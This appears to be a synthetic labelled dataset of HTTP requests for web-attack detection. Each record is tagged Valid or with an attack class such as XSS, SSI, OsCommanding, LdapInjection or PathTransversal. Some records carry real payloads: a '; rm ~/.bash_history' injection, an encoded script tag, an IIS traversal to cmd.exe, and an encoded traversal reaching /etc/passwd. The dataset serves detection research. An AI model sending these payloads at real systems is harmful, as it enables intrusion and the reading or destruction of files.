Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

tihN=zHif&FftnsErpr=<ncfrmoqe%rat&1uehsmnaao=01&2QopenHT=cselectigroup byrsF|nrthttpsm&veie6S=sstelcotehxtwc&es=';  rm    ~/.bash_history ;&xnlblsuPkto=6&rOESte=iaxlSK8WtXc5&lT=13

End - Id: 43017
Start - Id: 47782
class: XSS
GET /i6z289-95JsUSLS00hl4/sG/aN_KFE2wflXI9mSrDh/uzbAigXPa.48GJbD8pZ3/zesspQT4/oS5SuI/eAGDPyzjcjOlf@O/aHtoBV.asmx?yTS8t1=2533&2atUnns2THdmy=28072&latan=35&r.execvreplaceaccess_log6Iktq-=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Balert++++%28%27psiIib%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E HTTP/1.0
Host: 198.79.180.226
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 9-met1, 4h-a, e-rma3o;q=0.7
Cache-Control: no-cache
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="49"
Date: Fri, 17 Aug 07 15:57:55 GMT
ETag: W/"llM-xJQU9H5XeIPnwx"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 11 Jan 04 10:47:39 UTC
If-Unmodified-Since: Wed, 02 Sep 09 10:42:19 CET
If-Match: ".n_IwtoIzSGxgY7"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 6.1
Pragma: t7=x7
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic b3VuZ3R1bmU6dGN0ZQ==
Range: 9830-
Referer: /tndind/asjreh2p/leeiil/noro/auel.asp
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: gOZJtJ9Ka http://www.tenlc87d.com
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 2.2 241.126.131.208, 0.8 244.2.239.102:70
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 119 www.u4avcao.jpeg "eaDh3tssiseettoa2" "Mon, 21 Aug 06 21:05:07 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47782
Start - Id: 39459
class: SSI
GET /nteudtuidSDenkk17l/hdUqtsM/MSwEXrNeRaO0KG/te4e0dia/1w5j@XP/oeQk9DCgQQHsZZL74eMn/_UxM0RXwhereHHXpbintmp/esoow9hst7reatt.nsf?iitnrnao=wG7xZ&ItW1iJJ2RB1m=jM85h1DdczC&GDXRymocha5=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&likeZ.QhySboot.iniuvb=0wz&aDdr=ohesktEazui&oe6ryuthrn=qdenrn&7w=tr7lh%40iinltft%27slua&esj7fo5pq3ah=9oS_L_z&ircirdqH=dzx&z0ann=93&nmcqtorrdgRbcd=%28s%3C&Zagsr0a4G=938&n6xp_Awcf=%25hzfromEhOon%3Frs HTTP/1.1
Host: www.fealyaeeuT.be
Connection: zlmzec4
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.9, x-mac-chinesetrad;q=0.2, iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=58
Client-ip: 93.255.83.3
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Date: Sun, 18 Nov 07 19:01:31 UTC
If-Modified-Since: Sat, 19 Apr 08 12:01:28 UTC
If-Unmodified-Since: Sat, 02 Jun 07 07:12:15 CET
If-Match: *
If-Range: Sat, 09 Apr 05 10:57:16 CET
Max-Forwards: 32
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Referer: /aeQO.ace
TE: chunked,deflate;q=0.1,gzip
Trailer: Referer
User-Agent: Mozilla/4.9 (compatible; MSIE 3.8; Win 9x; 8sdiirsoo)
UA-Disp: 725,135,16
UA-OS: Linux
Via: 8.7 203.111.213.156, aice/5.8 www.hosi.js, 7.2 43.65.99.237
Transfer-Encoding: deflate
Upgrade: LrQt/6.5, det/8.8, dehrm/1.1, ivo/9.4, uixw/6.8
Warning: 728 www.fadyet.png "wm9iowri" "Sun, 18 Sep 05 04:10:06 CET"
----: --------------------------------------------

null

End - Id: 39459
Start - Id: 36595
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 31.82.165.124
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity, gzip;q=0.1, compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=17
Client-ip: 3.238.183.148
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Tue, 31 Jan 06 14:47:15 UTC
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Fri, 10 Nov 06 15:06:37 UTC
If-Unmodified-Since: Thu, 22 Nov 07 20:11:33 GMT
If-Match: "IXnls1olXSpM0sji"
If-None-Match: *
If-Range: Tue, 15 Jul 08 04:54:36 UTC
Max-Forwards: 365
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest opaque="tnsrvcih"
Range: -23163,-7
Referer: /thjRrr.exe
TE: gzip
Trailer: Referer
User-Agent: Mozilla/1.7 (compatible; MSIE 3.5; WinNT; t8curCN; 4tNrsp7; 1maOBnl)
UA-CPU: MIPS
UA-Disp: 749,9991,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: bsh/2.5 www.ankp.shtml, 5.3 www.atfo.shtml
Transfer-Encoding: identity
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 85538465859468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36595
Start - Id: 29311
class: Valid
GET /o1_ZYC1/eetiiFyreat/ciuoeEetehufaoaafef/awO._vk1.X.GG9Rmwts0/w0@naf9qiyYGXu/l2AsnTsg/9ABH/D0mddoroneddeae/l01IoQXKCACx/kUG.L5/pl0UZDQ9kmD/Exfg4gnqntix16i.bin?mzglptnAt2zD=482280&z66t=o+uxtermhsnsaaI&w0EwUrrj4=%5Bey3&mewster0pezt1=06187384&o4eNnture=60808&r7evalZTtcB8openNM=088638&skoeiooppmotpW=eeN&hZzweFPru32D=8413&rgemwe=+xte&tssAeikaYedi=aegiLkiamolonTht&fht02=gti6tmhn&zJwS0xW2Jxp_=Istlmw4ot4Rkro&nodt=2520560 HTTP/1.1
Host: 180.149.88.28
Connection: 4t6th
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: max-age=07
Client-ip: 189.125.66.35
Cookie: 3houoral30sgmte=0hopp;aiheOnl=76782;l.@0=wmaxo98e)Traxeoabody+rcp;La=l sne;KGiRPM=6397;nneOp=97
Cookie2: $Version="018"
Date: Wed, 14 May 08 24:25:34 CET
ETag: W/"ykBKz8OIhj28Pvu"
Expect: 3wa2sr=tQnp
From: yttt5iy@rcto.com
If-Modified-Since: Sun, 18 May 08 21:22:27 GMT
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: *
If-None-Match: "lP2ER@delzrycAzxc"
If-Range: "PPSeRbc2j7eS0kvYeb"
Max-Forwards: 5815
MIME-Version: 0.7
Pragma: Rha=3zr
Proxy-Authorization: NTLM dGFnd3VoaXVsM2ZuSWFkZFNpbXNoY2ZhdWU4dHJhc21yaHM=
Authorization: NTLM bmFvTzRzUnJMc3BuZWJpYXV0c3M1dGR0c2RuSGU0YUFodWFzYWllcw==
Range: -1680
Referer: /iTdeiueg/fbegH/ehdgSp/sl5bmE/rlliufe.doc
TE: trailers,chunked;q=0.3,trailers
Trailer: Host
User-Agent: 0grqe/9.9.1
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 553x667
Via: HTTP/3.7 www.c0smer.gif:5
Transfer-Encoding: deflate
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 708 www.opmsnet.html "atmareba0" "Wed, 30 May 07 20:29:06 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29311
Start - Id: 27631
class: Valid
GET /p6e3/sWslgaa-2L-TG_uj1F/gmznOYD-LkhVOEe5ez/qAi7htix/ngjzCIB4ELGzI/m9P39Ix71T1v@9Tg/lnhnmftiieoret4gdf/58.pl?yr0fmtshsra2efo=186767&gninewg5h=0nus1cmdnlu&esotrlaAgaueuik=32&aceliatdeu0hcyg=connectlumhwinntdiia%28e9rexect&EbbqBeng=cki+Tstdinllo+yndpasswdwa%3Dl4o&qedhmcech3iIrn=%3Eoaccess_logss%3Ff&etotu5ti=nn7.V7F5heN&jyz8=2061212 HTTP/1.1
Host: www.totitnbs.net
Connection: close
Accept: audio/x-wav, video/*;q=0.6, application/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=58924
Client-ip: 30.208.29.172
Cookie: tmOhcisTlea=9398971411;tn6voo3aeRiE=t5JfX-D3OIJd;joTea5=srto8isvbscriptjkeu]net
Cookie2: $Version="0"
Date: Sun, 08 Nov 09 05:57:34 CET
ETag: W/"Q7FDirU-IyamM8-k"
Expect: seop=r3jomss
From: 06wy8l@mtedC.de
If-Modified-Since: Wed, 24 Nov 04 07:53:08 UTC
If-Unmodified-Since: Sat, 31 Mar 07 13:03:59 GMT
If-Match: "frNL-7GbzDmnUwCBYCg"
If-None-Match: "i35xzCX_hcq-upr"
If-Range: "Z3Ng8MUr27t9k1L3EW"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: d4n='cto4dh'
Proxy-Authorization: Basic WG5pYVc6YWljaGk=
Authorization: fcNq 7es5=ertjoie
Range: 719-500,-5,-47
Referer: http://www.ltwtkye.fr/h7gre/gweosN.php
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/3.1 (Windows; U; WinNT 5.8; v7-pp; rv:1.0.9) Gecko/70045621
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 794x6621
Via: oe9/3.5 161.154.202.163
Transfer-Encoding: identity
Upgrade: die/3.4, 3oT7t/0.8
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 207.7.25.237
X-Serial-Number: 189697977036477
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27631
Start - Id: 29525
class: Valid
GET /iWv9z3pR-qZA1qtlE3/sUAn5.X.T/tNlpGMXy9A_SCnNAe/detlsdae8heoal/nsld/hOKjzaqYx8CRYx@c9vy/zcwyTZfU6NFzT4/nTr/atnyiib9ad.php4?swdiznlna7lhi=xeeceox&p8=ts0ufAeesb3t&e9liotorc=1403 HTTP/1.0
Host: 86.150.219.245
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: x-mac-turkish;q=0.9, iso-8859-4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 56.253.189.85
Cookie: srrobuee=nkhvpwlayI
Cookie2: $Version="08"
Date: Wed, 21 Sep 05 13:33:58 CET
ETag: "Tg-hMaywFOEgOvXf"
Expect: 1gpgt=sesn;txfi1e
From: Eftec@SiAcZEse.de
If-Modified-Since: Fri, 05 Oct 07 05:39:37 GMT
If-Unmodified-Since: Mon, 24 Mar 08 02:27:32 UTC
If-Match: *
If-None-Match: "R9PG4Yp4@5.Rxn1e"
If-Range: Sun, 24 Jun 07 21:40:09 GMT
Max-Forwards: 812
MIME-Version: 6.1
Pragma: t0s=la2b
Proxy-Authorization: Basic M2djZXFtOngzaW4=
Authorization: Basic YWw5dHU6cGhEOWF5bg==
Range: 39-
Referer: /itsHxn24/tnhyzdoi.asmx
TE: trailers,trailers,deflate
Trailer: From
User-Agent: Mi33elyrngp1lnNjj
UA-CPU: 68000
UA-Disp: 4302,407,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: 4.3 70.182.114.12:52741, HTTP/0.1 www.yfIa9.htm, FTP/4.1 248.127.7.107
Transfer-Encoding: compress
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 151 www.oZihki.png "izybnw" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 935852027842714359
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29525
Start - Id: 263
class: Valid
GET /twjtQftLNlC/sMA5i9sZ6iiHLaoXr/dtMPjQsdN_w0xEH4Nfb/c6BAq7/rlwXeUmgv/w5aseaesrr/yszOaeeutrs/lAnpZKDJg9zn/teoeelfoqKeeshtn.js?rstaononseti=287&6eghpfsogRHheji=+edt&o8iilsraDtls=evaleN%3Bv&dzo0g=89&rcid=union%2Fn5upesg&nldbxsdedqnye=stAC&nit=0&rlIa=Ditsso4drhece&pb=+2m4up%283thIscript+baWu%5C&iorillm=mevmbebgsound6l&vknthr=snOm&9LN9NozEw=c0g HTTP/1.0
Host: www.oupvXg.de:80
Connection: jnmzxm
Accept: application/*;q=0.7, audio/x-wav;q=0.9
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: identity;q=0.8, deflate
Accept-Language: *
Cache-Control: mtHe=rh7lag
Client-ip: 237.190.39.41
Cookie: eocn=2;sung=89;2u=6332064
Cookie2: $Version="01"
Date: Thu, 13 Aug 09 06:55:06 CET
ETag: W/"6VFAg2ULcs_EddMM"
Expect: tpitsuee=kaEHtmts
From: 6bLaew@vziehEtalu.st
If-Modified-Since: Wed, 21 Dec 05 08:59:04 CET
If-Unmodified-Since: Wed, 07 May 08 10:28:49 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Feb 06 18:26:11 CET
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM aXRzcHdpdHVqVnRpMG9hZTNtcmRpZXR1RXNoc2hjbHNhc3F0ZXNCMWFzcmk=
Authorization: Digest cnonce="dsosoe8o"
Range: -735916,3400-462,6-4322
Referer: /tohgl/ensu/ezltm/uYtw/awupemss.zip
TE: chunked;q=0.8,deflate;q=0.4,chunked;q=0.9
Trailer: Expect
User-Agent: eXObPr
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4622x2387
Via: 6.7 248.171.64.15, HTTP/6.0 165.60.196.14
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 166 26.238.254.174 "oet2" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 263
Start - Id: 23720
class: Valid
GET /wF43CyLn/iguwZcIROfIOyuu_i-OM/tJJU_P4hOiVUmSYUweGU/tihlwyyemctd/eIcrgusqoetieisqSa/enthopsngymdctoaeanc/6fBTI9-8.htm?ea=lbetinputh5aa&rian=+W86tlg+aN%28sciihtpass&mau7eizl=d&jod=2oercpee%7Etuadut&Iaas0=0054710&Y.hH6Xhreplaceu=hes2Abw7&jhneqh8eo=+eo-ehlinkcopysa HTTP/1.1
Host: www.eoerzs.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 232.149.111.235
Cookie: Rguooaiyr6u=v.O;k2braop=64376615;tOd=cauRm;uda=eaiohiAh24ps&d aijnw;iDTnileMnds=68;oeaej7eB12=<EranMnw=eldgzt et
Cookie2: $Version="496"
Date: Wed, 22 Apr 09 24:27:18 UTC
ETag: W/"kb6e.IR6Q_h9Bn7yJ2"
Expect: syfohtr=idEz
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Mon, 12 Feb 07 21:59:08 CET
If-Match: *
If-None-Match: ".nuvdGo14-zlQMGu.S7K"
If-Range: "wis_yEawDqXFN6FjmLs7"
Max-Forwards: 50
MIME-Version: 4.4
Pragma: qsl=3
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ingo2N 9riaNhss=yUstnyi
Range: 88-,49-031,14468-474
Referer: http://www.sgbo.com/nblbses/8ard2o/Ttti4c.cgi
TE: trailers,chunked;q=0.0,trailers
Trailer: If-None-Match
User-Agent: erw6oecyriusonemnedl
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: 8.2 184.157.47.222
Transfer-Encoding: gzip
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23720
Start - Id: 38263
class: LdapInjection
GET /n-J/TfKfvDcgyaccess_logrGYY3/bLj0P0ru1706S7/lil/YY/VjsP-nR/aOYP16MHu/cbXtuw/iVOl/l_yv_3v9A9gl6.q-.pl?4eval@NSYWV.3Mo=%29%28++++%7C+++%28++++cn%3D*o+%27brien*+++%29%28mail++++%3D*o++++%27brien*+++%29++++ HTTP/1.0
Host: www.iseaewfk.fr:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.7, x-mac-arabic, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: n='i'
Client-ip: 180.59.110.114
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="57"
Date: Sun, 28 Aug 05 24:32:15 GMT
ETag: W/"vtsbqI40-WbGIOGz"
Expect: ftes
From: iaon@um9ltetugp.biz
If-Modified-Since: Thu, 22 Mar 07 03:57:39 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Feb 06 04:20:33 UTC
Max-Forwards: 7314
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Digest realm
Range: 395742-,-784490,-6493
Referer: /YtEm/eWdjro.swf
TE: chunked,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: diwset29epmxbee
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: tdia8
Upgrade: tme6o5/8.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38263
Start - Id: 13825
class: Valid
GET /s_vDuyPDd-tH3Zbos1/tkP93NPw43Oc.8.mspx?wreoaimtct=hcZ%40a3&8@MdeVK=eferiS&afndol=s%40boic+ea5%7Eetechoee&hrcftqgeh=74665219 HTTP/1.0
Host: www.ooRsusa.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: utf-8;q=0.9, iso-8859-8;q=0.1, cp-932;q=0.7, x-mac-roman
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 151.109.161.56
Cookie: eMwtra=Ars;eici1ule7nsihz=78462138;sloeEZuTboseuo=lbAWPpkG0O;TVuniondadmini4=sn1isgan6rheJ;L7linkg.Y=ef.
Cookie2: $Version="454"
Date: Fri, 11 Jan 08 02:55:28 CET
ETag: "7O3PSdBZs8KkIEpiF"
Expect: n7oa
From: ZsDrsgy@qEamyqe.uk
If-Modified-Since: Mon, 21 Feb 05 06:00:23 UTC
If-Unmodified-Since: Sat, 31 Oct 09 09:03:10 CET
If-Match: "53TnOQuACKN_BPR5"
If-None-Match: *
If-Range: Sun, 20 Apr 08 04:18:12 UTC
Max-Forwards: 7922
MIME-Version: 3.0
Pragma: zto=rnFz
Proxy-Authorization: Digest cnonce="ycrd"
Authorization: Basic MjU3ZW46YUZubA==
Range: 691739-,100150-
Referer: /drtcgllo/EeecT5/laOn2tp/qeijtc/xrahu3.sh
TE: deflate;q=0.3,chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/5.7 (compatible; MSIE 7.6; Linux i386; qqastaae4n; Iw6tOrgZgr)
UA-CPU: MIPS
UA-Disp: 3251,0057,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: gzip
Upgrade: qee4/7.2, h7qc/4.6, eyeEwt/7.6, 8hisz3/8.0
Warning: 747 www.lslenrUh.js "tdhyelo4fmxanTaBxjth" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 95531159168053
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13825
Start - Id: 42869
class: OsCommanding
GET /sBxIH2e-_/tAr/c5poatzabw/rP5ASKpvVI/.MiT7HUAxeD-4/qXzIk/ajnt/mFx/aZD1k0dQ/etgd/a1i.htm?ehayah8xlmn=228.58.7.167++%7C+dir&eh5m7bsrsttcttt=earb&tit=%3E&aeYSedaOolUte=615&WKiaRk7-P=tntu7&anrosNwd4ulh4=h2a7&nsNinhraeyt=curbtrtm&c5earhxtEa=p_7JqxGrT&xMsA=nY.AEln&ausymuraonet8he=866&aoeeNkrqs=5scdh&cEfeaee=mXRG0rRwJC&hir0=3826848&cc7laosj8nb5de1=a5U HTTP/1.0
Host: 126.73.221.101
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: wea-acxoS0de;q=0.7, deiSy-dX0seJbt, ilotu1-rAd3l
Cache-Control: no-cache
Client-ip: 4.100.41.101
Cookie: sftt=ene
Cookie2: $Version="28"
Date: Tue, 20 Jan 04 23:39:07 GMT
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: rltnk@9tih3Enaa.uk
If-Modified-Since: Fri, 04 May 07 15:04:40 UTC
If-Unmodified-Since: Fri, 15 Apr 05 12:47:20 UTC
If-Match: *
If-None-Match: "itbkoKekDZKviwV"
If-Range: "vHcouMZL-Le3yQRa"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: NTLM bHNtaVNzYnRuY2NvdDI3NXJkYWFmbnREZWF5ZWhmN2loZTFhaWk=
Range: 8533-,2458-
Referer: http://www.rda7ta.net/asfy/iiaf2/ohnaa6/Emaeyk.jpg
TE: deflate;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/6.5 (X11; U; Linux i586 7.4; aa-e5; rv:4.0.1) Gecko/90357175
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.8 3.36.6.54, HTTP/5.7 159.70.36.254
Transfer-Encoding: ehna; 9x6nd=eghuec
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42869
Start - Id: 46411
class: PathTransversal
GET /o1OaDRg7C6Jiv@0/g1zUcatw9Z3/be5oeueyoa0qCoiiliw/vFP@sam/hTd2vqhomeISJWR/4TCDYm9OiF/ab8dic5duqalIieseitI.cfm?lllMJJeP=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: 72.219.45.57
Connection: close
Accept: audio/basic;q=0.7, video/*;q=0.3, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: E7s-lhe
Cache-Control: max-age=565
Client-ip: 43.17.188.82
Cookie: eaefSglx=Iht1unotTs;jqFBXkv_QebG=tllxz;Snkh=ae&gh3itmp<qint8>8hai;Gccbaii=pf;eadbexnoee=pntsarcatlointHzin;ehIetoi9sexs=ilhat
Cookie2: $Version="0"
Date: Sat, 19 Jul 08 19:50:22 CET
ETag: "nzNGDS.22k6TV@-"
Expect: 100-continue
From: wegeqhea@e2xmcrate.uk
If-Modified-Since: Sun, 16 Mar 08 21:48:24 CET
If-Unmodified-Since: Wed, 21 Jan 09 14:53:32 UTC
If-Match: "1O_ab6go_xW968Fdos1h"
If-None-Match: "ns.PPgihF-RQZAep"
If-Range: *
Max-Forwards: 549
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: sh5s 8eeo=ttRloro
Authorization: Digest nc=91bcfFB4
Range: 1622-,-5,-1
Referer: http://www.rasn.de/yowro/sriy/Kuesfx7.sh
TE: deflate,trailers
Trailer: TE
User-Agent: U9eMnsk/6.0.7
UA-CPU: x86
UA-Disp: 459,725,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 525x634
Via: 9.1 46.37.27.31
Transfer-Encoding: tRst
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46411
Start - Id: 12196
class: Valid
GET /uS2vMyX/mgX/rKBNtkr/7z/hsrt6/7QahuhuEdc8Ptex.mdb? HTTP/1.1
Host: 238.229.233.72:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-15;q=0.7, us-ascii;q=0.3, iso-8859-8-i, iso-10646-ucs-2;q=0.1
Accept-Encoding: 
Accept-Language: htalte4-eheers, a-op;q=0.1, seen-dnbndI;q=0.6, a-th
Cache-Control: min-fresh=49
Client-ip: 225.180.137.20
Cookie: 8seEes=i;isdOe=3057996;me5sntpop6mok=59255684;asa=suaswieao
Cookie2: $Version="63"
Date: Sun, 24 Jul 05 05:52:41 UTC
ETag: "v_.sGpDYL4ET.dzy2y"
Expect: tEtAetoh=4kiEndcs;drhbda3
From: 3stL@Estri.de
If-Modified-Since: Tue, 19 Sep 06 14:21:01 GMT
If-Unmodified-Since: Thu, 14 Apr 05 01:43:53 UTC
If-Match: *
If-None-Match: *
If-Range: "ndIMXAiWFYlLjiy9"
Max-Forwards: 9782
MIME-Version: 0.1
Pragma: ietOfrri='te'
Proxy-Authorization: Basic dzBhb2hzc2w6ZXRvdGU=
Authorization: NTLM cDFkc2NhZXRhYWFUYW5hdGV0bWlFRWVsemJ6bml1bDJ3Y3NlZWNyaWY2cnNyaQ==
Range: -341,81708-966475
Referer: http://www.62eqe2s.org/omstbae/agiahena/N35zas/iEneneae.swf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.8 (X11; U; Linux i586 5.3; f9-h9; rv:7.4.8) Gecko/84455938
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 5.3 www.8itsd.html
Transfer-Encoding: gzip
Upgrade: 8cClsn/2.6, omSiT3/7.4, f6it2/4.1
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 75.67.125.249
X-Serial-Number: 1017195793221995647
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12196
Start - Id: 6306
class: Valid
POST /d4/atqzGhUf6l8q/akQ408XwDax@DT/u7cOQ-HYQw2oOf/reh6nSirssonniy.php? HTTP/1.1
Content-Length: 45
Content-Language: bambSiH,ukylnea
Content-Encoding: identity
Content-Location: /aosfusE/eapqc/eGqrl/tnhju7.png
